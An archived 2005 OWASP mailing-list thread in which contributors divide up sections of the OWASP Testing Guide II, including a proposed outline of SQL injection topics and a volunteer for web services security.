[OWASP-TESTING] Next stage

Meghna Nadkarni meghnan at mahindrabt.com
Thu Jun 23 00:52:17 EDT 2005


Hi Daniel,

I would like to take up section on WebServices Security.....

Cheers,
Meghna

-----Original Message-----
From: owasp-testing-admin at lists.sourceforge.net
[mailto:owasp-testing-admin at lists.sourceforge.net] On Behalf Of Victor
Chapela
Sent: Wednesday, June 22, 2005 9:53 PM
To: 'Daniel Cuthbert'
Cc: owasp-testing at lists.sourceforge.net
Subject: RE: [OWASP-TESTING] Next stage

Hi Dan,

No problem covering the points you mention. In fact, as you say, this
may
turn up to be a very large section if I include all that I have on SQL
Injection. I would nevertheless add to what you suggest:
- Ways to determine DB engine type
- Oracle and DB2 injection
- IDS evasion
- Some checklist to determine injection type and risk level

What do you think I should NOT include?
- For example: I think it should NOT be a SQL injection course for
beginners, but more of a specific, incremental and step by step
methodology
to get to understand the query, privileges and capabilities to assess
the
potential risk. I think it should assume SQL and database specific
working
knowledge.

There is also some overlap with fuzzing, code review (for the whitebox
part)
and encryption. How will we coordinate our efforts so that we don't end
writing several times similar things.

-Victor

> -----Original Message-----
> From: Daniel Cuthbert [mailto:daniel.cuthbert at owasp.org]
> Sent: Tuesday, June 21, 2005 8:45 AM
> To: Victor Chapela
> Cc: owasp-testing at lists.sourceforge.net
> Subject: Re: [OWASP-TESTING] Next stage
>
> Thanks Victor
>
> SQL injection is an interesting one as the section is
> potentially huge Would you mind making sure that the
> following are covered if possible
>
> - standard sql injection
> - stored procedure injection with sql 2000
> - blind sql injection
> - mysql/post gres injection
> - mitigating circumstances
>
>
> On 21 Jun 2005, at 12:50, Victor Chapela wrote:
>
> >
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > Hi Dan,
> >
> > I have attached my name to all the SQL Injection related
> sections. I
> > can add the most value in these sections given my personal research.
> > I could help with other parts if needed (like other kinds of
> > injection), let me know.
> >
> > Best regards,
> > Victor
> >
> >
> >> -----Original Message-----
> >> From: owasp-testing-admin at lists.sourceforge.net
> >> [mailto:owasp-testing-admin at lists.sourceforge.net] On Behalf Of
> >> Daniel Cuthbert
> >> Sent: Tuesday, June 21, 2005 4:05 AM
> >> To: owasp-testing at lists.sourceforge.net
> >> Subject: [OWASP-TESTING] Next stage
> >>
> >> Morning all,
> >>
> >> Sorry for the short break in the testing guide progress, the real
> >> world caught up with me.
> >> Attached are the documents needed for the next part of the
> guide, and
> >> they are:
> >>
> >> Testing Guide II Structure.doc
> >>
> >> This is the final TOC as we agreed and next to each
> section, there is
> >> the option to add your name and your e-mail address(i.e
> you will be
> >> writing this section)
> >>
> >> template1.htm
> >>
> >> If you could structure all your submissions using this
> template (you
> >> can use any format you like, word/text/xml, as long as i
> can read it
> >> on a mac!)
> >>
> >> Guidelines for creating sections:
> >>
> >> - DO NOT DO A STRAIGHT COPY FROM ANY OTHER SOURCES ON THE WEB!
> >> Plagiarism won't be accepted.
> >> This testing guide should reflect the experience you all have in
> >> application testing. One of the benefits of OWASP is that
> the wealth
> >> of experience from the contributors enables the reader to
> understand
> >> the section they are reading, as it is presented in a well
> structured
> >> format, which unlike a large amount of research papers on the web
> >> today, isn't normally the case.
> >>
> >> - Try and use examples where possible and also let other
> >> "non- security" individuals read what you have written.
> This ensures
> >> that it makes sense to everyone and not just the hardcore
> penetration
> >> testers out there.
> >>
> >> - I understand everyone has a life and work commitments, so please
> >> don't select loads of sections if you know you may not be able to
> >> commit to them in the end run.
> >>
> >> - Contact me if you have any issues during this next phase
> >>
> >>
> >> I think we should aim to have all the sections written by
> mid August,
> >> how does this sound for everyone?
> >>
> >> Obviously if you feel there is a section missing from the
> TOC, by all
> >> means contact me
> >>
> >> Look forward to seeing the work coming in
> >>
> >> Daniel Cuthbert
> >>
> >
> > -----BEGIN PGP SIGNATURE-----
> > Version: PGP 8.1
> >
> > iQA/AwUBQrf/IL6TmquzxiX9EQIwGgCff2FwSkMwAHtkVa9FE3nIBvwAHz0AoPvf
> > i69Wf8656wb/YhxRCf9VExJd
> > =OKq+
> > -----END PGP SIGNATURE-----
> >
> >
> > <Testing_Guide_II_structure.doc>
> >
>
>



-------------------------------------------------------
SF.Net email is sponsored by: Discover Easy Linux Migration Strategies
from IBM. Find simple to follow Roadmaps, straightforward articles,
informative Webcasts and more! Get everything you need to get up to
speed, fast. http://ads.osdn.com/?ad_id=7477&alloc_id=16492&op=click
_______________________________________________
owasp-testing mailing list
owasp-testing at lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/owasp-testing

**************************************************
Disclaimer:

The contents of this E-mail (including the contents of the enclosure(s) or attachment(s) if any) are privileged and confidential material of MBT and should not be disclosed to, used by or copied in any manner by anyone other than the intended addressee(s). In case you are not the desired addressee, you should delete this message and/or re-direct it to the sender. The views expressed in this E-mail message (including the enclosure(s) or attachment(s) if any) are those of the individual sender, except where the sender expressly, and with authority, states them to be the views of MBT.

This e-mail message including attachment/(s), if any, is believed to be free of any virus. However, it is the responsibility of the recipient to ensure that it is virus free and MBT is not responsible for any loss or damage arising in any way from its use
**************************************************




More information about the Owasp-testing mailing list